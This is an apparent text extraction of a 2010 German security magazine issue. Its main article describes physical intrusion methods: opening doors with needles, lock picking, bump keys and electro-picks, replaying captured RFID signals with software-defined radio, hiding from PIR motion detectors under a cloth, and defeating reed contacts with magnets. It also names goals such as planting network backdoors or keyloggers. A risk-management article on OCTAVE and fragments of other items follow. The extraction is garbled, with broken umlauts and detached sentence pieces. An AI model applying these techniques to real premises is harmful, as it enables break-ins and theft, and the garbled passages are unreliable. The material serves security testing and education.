Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
